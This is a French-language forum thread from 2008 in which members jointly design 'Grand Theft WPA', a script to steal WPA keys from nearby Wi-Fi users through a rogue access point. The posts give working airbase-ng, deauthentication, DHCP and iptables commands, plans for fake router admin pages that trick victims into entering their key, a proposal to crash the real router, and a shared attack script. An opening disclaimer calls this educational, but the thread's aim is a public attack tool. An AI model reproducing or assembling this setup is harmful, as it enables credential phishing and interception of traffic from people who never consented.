Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-11-2008 19:57:35

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

AVERTISSEMENT IMPORTANT

Ce sujet traite de l'utilisation d'un programme open source public et accessible à tous: Airbase-ng, cet outil offre des fonctionnalités avancées d'attaques dite "Rogue AP". Le but de cette discussion est de mieux comprendre les possibilités offertes par les nouvelles attaques Rogue AP et les effets sur nos réseaux afin d'etre à meme de prendre les mesures qui s'imposent pour contrer ces attaques exploitant des failles humaines ou logicielles. Cette discussion, destinée à des passionnés de réseau et de sécurité, a pour but d'apprendre à protéger son réseau, et aucunement d'inciter qui que ce soit à enfreindre la loi. C'est en comprenant comment fonctionnent les attaques que l'on apprend à s'en protéger. Comme nous l'avons déja rappelé à plusieurs reprises sur le forum, et dans les Règles, il est strictement interdit par la loi de s'introduire sur un système de traitement automatisé de données dont vous n'etes pas le propriétaire. Nous n'hésiterons pas à bannir du forum toute personne présentant un discours douteux à ce niveau.

Les différentes pages web modifiées ressemblant à des pages d'administration de routeurs bien connus sont uniquement un support pédagogique destiné à illustrer les possibilités des attaques modernes par Rogue AP. On peut trouver sur de très nombreux sites web traitant de réseau, de wifi et d'informatique des captures d'écran ou des copies de ces pages, nous les utilisons simplement pour illustrer la dangerosité des attaques modernes qui menaçent nos réseaux wifi.

Alors voila... On y est. Ca me trotte dans la tete depuis un bon moment, et comme le sujet intéresse pas mal de monde sur le forum, et que quelques membres semblent intéressés par la création d'un outil dédié à la récupération de clés WPA via une attaque rogue AP (airbase-ng), j'ai l'honneur de démarrer ce sujet en vous présentant le principe que j'ai en tete, il va s'agir de créer notre outil que j'ai nommé Grand Theft WPA (GTWPA), en référence à un jeu bien connu wink ,  et qui va automatiser tout ça sous Backtrack 3:

Le tool se présentera sous la forme d'un petit script.

L'utilisateur télécharge et éxécute le script. Il a d'abord la possibilité d'installer l'outil (le script va aller télécharger par wget tous les fichiers nécessaires à l'attaque qui seront hébergés sur crack-wifi.com: fichier httpd.conf modifié pour que la rogue AP ramène les clients vers les pages qui seront situés dans le dossier "rogue" qui sera créé sur le Desktop, pages index des interfaces d'administration de différentes box et leurs fichiers associés, fichier hosts pour rediriger toutes les requetes dns du client vers notre serveur etc...)

L'utilisateur peut maintenant choisir de passer en mode "préparation de l'attaque", il va choisir sa cible. Par exemple, si il choisit une Livebox, l'essid lui sera demandé par le script. Avec les infos validées, le script va copier dans Desktop/rogue/ l'index.php et les fichiers associés correspondant à l'interface d'administration d'une Livebox. Le script va aussi modifier dans la page la variable $essid, ce qui permettra de personnaliser la page en fonction de l'essid ciblé. Le script pourra maintenant démarrer le serveur Apache.

La partie serveur étant prete, l'utilisateur peut maintenant lancer l'attaque. Le script lui demande quelques informations comme le canal, l'adresse mac de la cible etc... et lance airbase-ng, ettercap-ng et dnsspoof. Si la connection tarde à s'établir, un mode "déauth" pourra etre lancé parallèlement à l'attaque pour aider le client à se connecter sur la rogue AP.
Quand le client se connecte à la rogue AP, il tombe sur l'interface d'administration que l'utilisateur du script a pris le soin de choisir en fonction de la box. La page affiche un message du type: "Mise à jour réussie, veuillez valider votre clé WPA pour vous authentifier et vous connecter au réseau". Le client rentre sa clé et valide, la variable $essid et la clé associée sont récupérés dans un fichier txt créé dans le dossier /Desktop/rogue/

Et là BINGO: KEY FOUND sans handshake, sans attaque dico qui prend des jours, voire des semaines big_smile

Voila pour le principe. Tout cela est à développer, tester, coder, il y a encore beaucoup de travail. Un topic dédié aux pages d'interface d'administration des différentes box a déja été créé par webcapitain: Technique de recuperation de clef WPA par rogue et PHP. Toute contribution est la bienvenue, pour partager des pages d'interface d'administration de vos différentes box ou pour nous aider à développer GTWPA.

Pour commencer, vous pouvez déja vous intéresser à Airbase-ng qui sera en quelque sorte le "pilier" de notre tool. Dans un premier temps, il faut étudier et tester airbase-ng afin de trouver les bonnes options qui permettent un filtrage efficace afin de ne pas ramener toutes les stations environnantes sur notre rogue AP. Je tiens par avance à remercier les membres passionnés qui prennent part à cette aventure, l'outil que nous allons développer sera entièrement public bien entendu et j'éspère que notre travail en commun permettra de faire un grand pas en avant dans le domaine du crack WPA wink

PS: Vous pouvez suivre sur le forum remote-exploit 2 discussions TRES intéressantes traitant d'attaques rogue AP + metasploit pour la récupération de clés WPA:

Bruteforce attack useless
Fake AP WEP/WPA key grab- Video and commands

Vous y apprendrez plein de choses, moi aussi d'ailleurs car il me semble que la partie dhcp et mitm avec airbase-ng va demander un peu de boulot quand meme avant d'etre fonctionnelle, et une fois que notre tool sera au point nous prendrons le temps d'y ajouter ce type d'attaque automatique via metasploit, histoire d'en faire un outil vraiment complet pour le crack WPA smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-11-2008 15:58:11

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Super tout ça big_smile

En plus ça avance à une vitesse, vous codez vraiment à une vitesse phénoménale tous les deux smile

M1ck3y a écrit :

L'utilisateur télécharge et éxécute le script. Il a d'abord la possibilité d'installer l'outil (le script va aller télécharger par wget tous les fichiers nécessaires à l'attaque qui seront hébergés sur crack-wifi.com: fichier httpd.conf modifié pour que la rogue AP ramène les clients vers les pages qui seront situés dans le dossier "rogue" qui sera créé sur le Desktop, pages index des interfaces d'administration de différentes box et leurs fichiers associés, fichier hosts pour rediriger toutes les requetes dns du client vers notre serveur etc...)

L'utilisateur peut maintenant choisir de passer en mode "préparation de l'attaque", il va choisir sa cible. Par exemple, si il choisit une Livebox, l'essid lui sera demandé par le script. Avec les infos validées, le script va copier dans Desktop/rogue/ l'index.php et les fichiers associés correspondant à l'interface d'administration d'une Livebox. Le script va aussi modifier dans la page la variable $essid, ce qui permettra de personnaliser la page en fonction de l'essid ciblé. Le script pourra maintenant démarrer le serveur Apache.

Tiens d'ailleurs, il faudra qu'on pense à faire des interfaces d'admin de box anglaises smile

Et pour le script, est-ce qu'on pourra l'appeler directement avec des arguments ?
Dans le style :

$ GTWPA -bssid Wanadoo-efd9 --mac XX:XX:XX:XX:XX --climac XX:XX:XX:XX:XX --mode deauth --box Wanadoo

Ça permettra d'utiliser facilement ce programme avec un Gui smile



M1ck3y a écrit :

La partie serveur étant prete, l'utilisateur peut maintenant lancer l'attaque. Le script lui demande quelques informations comme le canal, l'adresse mac de la cible etc... et lance airbase-ng, ettercap-ng et dnsspoof. Si la connection tarde à s'établir, un mode "déauth" pourra etre lancé parallèlement à l'attaque pour aider le client à se connecter sur la rogue AP.

En plus d'un mode déauth, pourrait-on faire un mode qui utilise MDK3 pour crasher la box (je sais, c'est un peu extrême, mais au moins, le client sera obligé de se connecter sur la rogue, et on peut lui demander de redémarrer sa box à la fin de la "procédure").


M1ck3y a écrit :

PS: Vous pouvez suivre sur le forum remote-exploit 2 discussions TRES intéressantes traitant d'attaques rogue AP + metasploit pour la récupération de clés WPA:

Bruteforce attack useless
Fake AP WEP/WPA key grab- Video and commands

Vous y apprendrez plein de choses, moi aussi d'ailleurs car il me semble que la partie dhcp et mitm avec airbase-ng va demander un peu de boulot quand meme avant d'etre fonctionnelle, et une fois que notre tool sera au point nous prendrons le temps d'y ajouter ce type d'attaque automatique via metasploit, histoire d'en faire un outil vraiment complet pour le crack WPA smile

Merci pour ces liens intéressants smile


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#3 23-11-2008 16:07:10

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Bon alors en ce qui concerne le script, je ne sais que scripter en bash de base... Tu n'a qu'à voir comment sont scriptés les quelques petits tools que j'ai mis à disposition dans la section Backtrack, outils de pentesting & Linux en général.

Si tu veux m'aider pour qu'on scripte d'une façon plus propre, et qui permettra d'utiliser le tool avec un gui par la suite, je suis ouvert à tous les conseils wink

Pour l'instant, j'ai réussi à faire une rogue AP fonctionnelle avec airbase-ng, avec un petit coup de main de aireplay-ng -0 (déauth), le client se connecte. J'en suis aux paramètrages réseau et dhcp histoire d'attribuer une ip au client afin de pouvoir lancer le dns spoof par la suite, je vous tiendrais au courant quand ça aura avancé, pour l'instant j'ai planté les interfaces réseau du BT3, et il reboot lol

Hors Ligne

#4 23-11-2008 17:51:41

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Bon, ça s'annonce tendu pour faire tourner tout ça...

Je vous tiens au courant de mes tests de cet après midi, qui n'ont malheureusement pas abouti à quelque chose d'exploitable pour l'instant. Avant de scripter notre tool, il faut connaitre les commandes fonctionnelles...

Je suis sous BT3 Final, la carte qui sert pour la rogue AP est une awus036h (wlan0) et je suis connecté au net via eth0, l'ip du BT3 est 192.168.1.12 et ma box est en 192.168.1.1. La cible est un réseau en WPA TKIP (essid "linksys").

Tout d'abord, j'active le mode monitor, et je lance le scan airodump-ng pour surveiller le réseau:

airmon-ng start wlan0
airodump-ng --encrypt wpa -c 1 --bssid 00:0C:41:D3:12:81 wlan0

Ensuite j'active la rogue AP:

modprobe tun
airbase-ng -a 00:0C:41:D3:12:81 -e linksys -v -c 1 -z 2 wlan0

Si le client refuse de se connecter, un petit coup de déauth peut aider:

aireplay-ng -0 5 -a 00:0C:41:D3:12:81 wlan0

Pour la suite, je me suis inspiré du post de =Tron= sur remote exploit, c'est le post numéro 16 ici: Fake AP WEP/WPA key grab- Video and commands.

Je modifie le fichier /etc/dhcpd.conf:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.0;
option domain-name-servers 10.0.0.1;
range dynamic-bootp 10.0.0.16 10.0.0.55;
}

Je lance un petit script pour configurer l'interface virtuelle at0:

#!/bin/bash

ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

Puis je démarre le serveur dhcp:

killall dhcpd
dhcpd -d -f -cf /etc/dhcpd.conf at0

Et là... Ca ne fonctionne pas. Pourtant dans mon shell airbase-ng, je peux voir:

08:58:16  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
08:58:16  Got an auth request from 00:12:F0:6F:ED:38 (open system)
08:58:16  Client 00:12:F0:6F:ED:38 associated (WPA1;TKIP) to ESSID: "linksys"
08:58:20  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
08:58:20  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
08:58:20  Got broadcast probe request from 00:12:F0:6F:ED:38
08:58:21  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
08:58:21  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
08:58:21  Got broadcast probe request from 00:12:F0:6F:ED:38
08:58:22  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
08:58:22  Got an auth request from 00:12:F0:6F:ED:38 (open system)
08:58:22  Client 00:12:F0:6F:ED:38 associated (WPA1;TKIP) to ESSID: "linksys"
08:58:26  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"

Etc... On dirait que la station cherche à s'associer, mais il y a un truc qui cloche. Je peux voir sur ma station de test (qui tourne sous win) l'icone de la connection wifi qui se met en état "Lecture de l'adressage réseau", puis ça déconnecte (croix rouge sur l'icone), puis ça essaie de se connecter à nouveau, cela plusieurs fois et au bout d'un moment l'icone se fige, la station reste déconnectée, il faut que je désactive/réactive la carte de la station pour reprendre les tests. Un truc qui parait suspect, c'est que lorsque la station était sur le point de se connecter, apparemment elle n'a pas réussi à obtenir une adresse IP car l'interface at0 était down:

bt ~ # dhcpd -d -f -cf /etc/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:0c:41:d3:12:81/10.0.0/24
Sending on   LPF/at0/00:0c:41:d3:12:81/10.0.0/24
Sending on   Socket/fallback/fallback-net
receive_packet failed on at0: Network is down

bt ~ #

Le serveur dhcp a l'air d'etre planté, et je ne sais pas pourquoi... Pourtant dans le script de config at0, on a bien activé l'interface virtuelle:

ifconfig at0 up

J'ai besoin de vous pour m'aider à avancer de ce coté, car c'est loin d'etre évident. Si vous pouvez tester la mise en place de la rogue AP sur votre réseau, n'hésitez pas à venir partager vos découvertes, c'est comme ça qu'on va avancer!

Hors Ligne

#5 23-11-2008 23:24:36

webcapitain
Membre Indéboulonnable
Inscription : 21-11-2008
Messages : 143

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Je viens de reperer ce topic (dsl j'ai pas cherché neutral)
maintenant que la page de livebox et numericable sont terminés on va continuer !! pas vrai les gars ?? bon je coince encore coté neufbox (foutu frames mal gérés sous dreamweaver cs3) sinon coté php ça avance !!

Hors Ligne

#6 24-11-2008 09:59:15

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Salut M1ck3y,

Indépendamment du serveur dhcp qui ne démarre pas, as-tu une ip en 10.0.0.xx sur ton windows ?
Car moi je vois aussi mon windows se connecter dans airbase : Client 00:1D:XX:XX:XX:XX associated (unencrypted) to ESSID: "linksys".
Sous windows il marque bien que je suis connecter à linksys.
Mais impossible d'acquérir une adresse ip "valide" en 10.xxxxx.

Atrax

Hors Ligne

#7 24-11-2008 12:46:27

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Salut Atrax, bienvenue sur le forum, et merci de t'intéresser à ce sujet wink

Non justement, le client sous win bloque à l'attribution de l'adresse ip, alors il se déconnecte, il se reconnecte et attend de se faire attribuer une ip etc... Jusqu'à ce qu'il soit complètement déconnecté et que le serveur dhcp coté Backtrack ait crashé. C'est vraiment bizarre.

Hors Ligne

#8 24-11-2008 16:11:41

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Alors j'ai réussi à faire une Rogue AP totalement transparente, c'est à dire que la personne qui se connecte sur la rogue peut surfer ! Pratique, on peut lancer Wireshark sur l'interface at0 créée par airbase, et sniffer autant qu'on veut.

Je sais que le sujet ici est une rogue non transparente qui redirige le trafique vers un serveur web local, mais c'est presque pareil et la différence réside dans les iptables.

Mais tout n'est pas rose pour l'instant, car si la manip a fonctionné avec avec un ralink WN321G en fake AP, elle n'a pas fonctionné avec mon Alfa 500 !!

Alors sous backtrak j'ai 2 cartes usb wifi (Alfa 500 wlan0 et WN321G rausb0) dont une pour me connecter à internet.

Victime >>> FakeAP (rausb0) >>> Backtrack3 >>> RealAP (wlan0) >>> Internet     [[CONFIG QUI MARCHE]]
Victime >>> FakeAP (wlan0) >>> Backtrack3 >>> RealAP (rausb0) >>> Internet     [[CONFIG QUI NE MARCHE PAS]]

Alors dans les 2 cas sous Vista (carte wifi intel) j'obtiens une ip en 10.0.0.xx, mais dans le premier cas je peux surfer et le deuxieme impossible comme s'il y avait un problème de dns.

Donc M1ck3y, si tu as la possibilité de faire des tests en ce sens...

Voici ce que j'ai utilisé (à adapter) :

Shell 1

ifconfig wlan0 down
modprobe r8187
modprobe tun
ifconfig wlan0 up
iwconfig wlan0 mode monitor
airbase-ng -P -C 30 -e "Wifi100" -v wlan0

Shell 2

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
cd /
cd etc
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo > dhcpd.leases
killall dhcpd
dhcpd -cf dhcpd.conf -lf dhcpd.leases at0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1 # DNS
iptables --table nat --append POSTROUTING --out-interface rausb0 -j MASQUERADE # gateway to ext. router
iptables --append FORWARD --in-interface at0 -j ACCEPT # rogue gateway
echo 1 > /proc/sys/net/ipv4/ip_forward

Hors Ligne

#9 24-11-2008 16:14:30

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

J'oubliais ma config dhcpd.conf

option domain-name-servers 10.0.0.1;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style ad-hoc;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  option subnet-mask 255.255.255.0;
  option broadcast-address 10.0.0.255;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
  range 10.0.0.10 10.0.0.50;
}

Hors Ligne

#10 24-11-2008 16:35:04

webcapitain
Membre Indéboulonnable
Inscription : 21-11-2008
Messages : 143

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Pas mal si tu as réussi à en arriver la smile
je laisse M1ck3y repondre à ta question.
a plus wink

Dernière modification par webcapitain (24-11-2008 16:35:57)

Hors Ligne

#11 24-11-2008 23:13:49

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Atrax, pourrais tu nous poster les détails de ta manip qui a été fonctionnelle avec la rt73? Et pourrais tu nous donner les détails de la config de test que tu utilises (encryption utilisée, cipher... WEP, WPA TKIP, WPA CCMP etc...), nous en dire plus sur la qualité du signal, la manière dont tu as procédé pour que le client se connecte à la rogue ap (il s'est déconnecté tout seul de l'ap, tu n'as rien eu à faire, ou bien tu as du envoyer une déauth pour qu'il se connecte,est ce que tu as vu quelque chose en particulier sur l'icone wireless du client lorsqu'il est passé de l'ap original à la rogue, quelle adresse ip lui a été attribuée???

Ca fait beaucoup de questions je sais, mais pour etre franc là j'ai vraiment besoin d'avoir le maximum de détails car je suis en train de me prendre la tete là dessus depuis ce week end, je teste des trucs, je cherche sur le forum remote exploit, sur le forum aircrack-ng, et je galère pas mal pour obtenir un résultat satisfaisant (le truc amusant, c'est que j'arrive très facilement à m'auto-hacker, c'est à dire à connecter à la rogue sans le vouloir mon client bridge qui est en ip fixe, et dans ce cas je n'ai plus de connexion jusqu'à ce que je stoppe airbase-ng, en revanche pour connecter mon client test ça déconne à bloc).

Je te remercie, tes indications et conseils peuvent vraiment nous aider à faire avancer notre projet.

Hors Ligne

#12 25-11-2008 10:26:46

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

J'ai un portable sous windows vista et backtrack 3 sous vmware. Bridge/NAT désactivé entre les 2 (rien à voir avec notre rogue ap, mais c'est pour expliqué pourquoi je n'utilise pas eth0)

TL-WN321G (drivers rt73) rausb0 ==> rogue ap
ALFA 500 (drivers r8187) wlan0 ==> connectée à internet (Livebox)

(j'ai eu de problèmes avec numéricable ca n'a pas marché, je dois faire d'autres tests pour vérifier)

Sell 1

ifconfig rausb0 down
modprobe rt73
modprobe tun
ifconfig rausb0 up
iwconfig rausb0 mode monitor
airbase-ng -P -C 30 -e "linksys" -v rausb0

Sell 2

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
cd /
cd etc
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo > dhcpd.leases
killall dhcpd
dhcpd -cf dhcpd.conf -lf dhcpd.leases at0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1 # DNS
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE # gateway to ext. router
iptables --append FORWARD --in-interface at0 -j ACCEPT # rogue gateway
echo 1 > /proc/sys/net/ipv4/ip_forward

dhcpd.conf

option domain-name-servers 10.0.0.1;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style ad-hoc;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  option subnet-mask 255.255.255.0;
  option broadcast-address 10.0.0.255;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
  range 10.0.0.10 10.0.0.50;
}

Je me suis connecté sous vista (wifi intel 4965 intégré) avec le gestionnaire de vista. Le réseau linksys est apparu non sécurisé (airbase sans encryption). Après une connexion réussie, j'ai eu droit à ma petite planète sur l'icône réseau m'indiquant que j'avais accès à internet. En mettant la souris sur l'icône réseau j'avais "Actuellement connecté à : linksys  Accès à Local et Internet".

Ipconfig me montre une ip 10.0.0.50 conforme au dhcpd.conf. Navigateur lancé j'ai pu surfer et suis allé sur whatismyipaddress.com qui m'a indiqué que j'avais l'adresse ip de la Livebox sur laquelle BT étais connectée.

Durant mes tests, un autre ordi s'est connecté (on peut le voir sous backtrack avec la commande arp -n -v -i at0), il avait l'ip 10.0.0.49 avec une adresse mac que je ne connaissais pas, sous entendu pas une des miennes)

Voilou, d'autres tests cet après-midi.

Atrax

Hors Ligne

#13 25-11-2008 12:37:15

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Ok Atrax, je te remercie pour ces informations. Ma config de test est légèrement différente: mon BT3 est aussi sous VMWare, mais j'ai la connexion internet via le bridge (eth0 donc) et le client est un windows XP sur un autre ordi. Une chose m'étonne: vu que tu es connecté par le wifi, tu ne t'es pas auto hacké avec ta rogue AP? Car sur ma config de test, meme en spécifiant l'essid "linksys", j'avais tendance à rabattre vers la rogue ap la carte wifi de mon ordinateur hote...

Une précision: c'est toi qui a lancé la connexion sur la rogue ap, ou bien tu étais connecté au préalable sur un réseau "linksys" et tu t'es retrouvé sur la rogue ap sans toucher à rien?

Bon, enfin c'est bien, on avance petit à petit, tiens nous au cournat des résultats de tes tests wink

PS: pour voir ton adresse ip, il te suffit d'aller sur la page d'accueil du site: accueil crack-wifi.com, tu peux voir ton adresse ip dans une box sur la droite de la page, c'est fait pour smile

Hors Ligne

#14 25-11-2008 18:52:53

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Bon j'ai fais quelques tests supplémentaires, et je confirme ça ne marche pas avec l'alfa 500 en rogue ap.
J'ai testé le mode master sur la carte, rien n'y a fait.

Pour l'heure je refais une install de BT3 car la mienne est toute cassée.

Hors Ligne

#15 25-11-2008 19:06:46

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Oui, j'ai déja vu quelque part que l'awus036h ne supporte pas le mode master (limitation au niveau du driver il me semble), mais cela n'empeche pas (en principe) d'utiliser airbase-ng car sous airbase-ng on est en mode monitor. Et dans les topics traitant du sujet sur le forum remote exploit, certains membres ont réussi à faire tourner airbase-ng avec l'awus036h... Mais si les manips sont particulières en fonction des cartes, le scriptage du tool va etre beaucoup plus compliqué que prévu hmm

Hors Ligne

#16 26-11-2008 15:49:50

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

J'ai réussi la rogue AP non transparente qui redirige vers le serveur httpd de backtrack !!!

En gros quand je me connecte à la rogue avec internet explorer sous vista avec page d'accueil www.google.fr, je suis redirigé sur la page par défaut d'apache sous BT3 où il y a marqué "It works !"

Il me reste des modifications à effectuer, pour réduire les interactions, enfin je me comprends et je poste ça plus tard dans la journée.

Dernière modification par Atrax (26-11-2008 15:50:45)

Hors Ligne

#17 26-11-2008 15:52:24

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Youpi ! Merci beaucoup pour ton travail Atrax smile !


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#18 26-11-2008 19:22:47

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

On attend tous très impatiemment ton post Atrax, la rogue ap via airbase-ng déchaine les passions sur le forum, on a le coeur qui palpite...

Hors Ligne

#19 26-11-2008 19:29:30

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Ca ne tarde pas, voilà les premiers éléments de travail à tester :
RogueAP.tar.gz

Loin d'être totalement fonctionnel, au moins ça marche !!

Donc à tester.

Notice le dossier RogueAP doit être sur le Desktop, et il n'y a rien à changer au dhcpd.conf d'origine de BT3
Dans un shell, lancez d'abord le Script1 puis un fois airbase demarré, lancez le Script2.

Voilou

Hors Ligne

#20 26-11-2008 19:48:50

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Ils m'ont l'air bien sympas tes scripts. C'est déja une bonne base à tester pour notre projet. De tout coeur: un grand MERCI Atrax smile

Hors Ligne

#21 26-11-2008 23:17:07

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

j'ai un peu regardé le fonctionnement d'airmon-ng(qui est un .sh), pour voir comment on pourra utiliser le script dans un Gui ;

Donc on dirait que un script appelé de cette manière :

GTWPA MA:CB:OX:55:66:77 Livebox-89E0 MA:CL:IE:NT:55:88 Livebox

Aura ces variables là :

$0 : GTWPA
$1 : MA:CB:OX:55:66:77
$2 : Livebox-89E0
$3 : MA:CL:IE:NT:55:88
$4 : Livebox

J'ai particulièrement remarqué que c'était comme ça sur cette fonction :

startStdIface() {
    iwconfig $1 mode monitor 2> /dev/null >/dev/null
    iwconfig $1 channel $2 2> /dev/null >/dev/null
    iwconfig $1 key off 2> /dev/null >/dev/null
    ifconfig $1 up
    printf " (monitor mode enabled)"
}

Car on appelle airmon-ng avec "airmon-ng start rausb0 14"

En espérant avoir aidé r9r2ddp3zd3f5yg0z0k.gif

Dernière modification par Tite-Live (27-11-2008 00:02:20)


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#22 26-11-2008 23:24:38

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Mais comment le script sait que le premier argument est la $0, le deuxième la $1 etc? C'est à nous de le définir?

Ton lien vers airmon-ng ne fonctionne pas, il y a un numéro de session ou quelque chose comme ça dans l'url?

Hors Ligne

#23 26-11-2008 23:36:31

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

M1ck3y a écrit :

Mais comment le script sait que le premier argument est la $0, le deuxième la $1 etc? C'est à nous de le définir?

Il me semble que c'est automatique.
En lançant un script de cette manière "script.sh Livebox" la variable $1 aura automatiquement comme contenu "Livebox".
Et si on le lance comme ça : "script.sh Livebox Handshakeonly" $1 contiendra Livebox et $2 Handshakeonly.
Et caetera...

Ton lien vers airmon-ng ne fonctionne pas, il y a un numéro de session ou quelque chose comme ça dans l'url?

Certainement, ou peut-être que je n'ai pas mis le fichier en public... rahh il est trop compliqué leur système chez esnips lol !
J'ai changé le lien, maintenant ça marche :-)

Bonne soirée smile

Edit : je me suis trompé, $0 donne le nom du script, donc $1 est le premier paramètre. je modifie mes messages en conséquence smile
Sinon, j'ai trouvé quelques liens :
http://www.linux-pour-lesnuls.com/bash.php#parametres

http://ftp.traduc.org/doc-vf/gazette-li … 111-D.html
-> J'ai trouvé très intéressant leurs explications :

$0 - Le nom du script en cours d'exécution - dans ce cas, "bkup".
$1 - Le premier paramètre - dans ce cas, "file.txt" ; n'importe quel paramètre
peut être désigné par $<numéro> de cette manière.
#@ - La liste complète des paramètres - "$1 $2 $3..."
$# - Le nombre de paramètres.

http://abs.traduc.org/abs-5.3-fr/ch04s04.html#ex17
-> exemple de script avec paramètres
En plus, ils expliquent bien les paramètres smile

Ce sont les arguments passés aux scripts depuis la ligne de commande - $0, $1, $2, $3...

$0 est le nom du script lui-même, $1 est le premier argument, $2 le second, $3 le troisième, et ainsi de suite. Après $9, les arguments doivent être entourés d'accolades, par exemple ${10}, ${11}, ${12}.

Les variables spéciales $* et $@ représentent tous les paramètres positionnels.

Dernière modification par Tite-Live (27-11-2008 08:02:05)


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#24 27-11-2008 00:05:51

M1ck3y
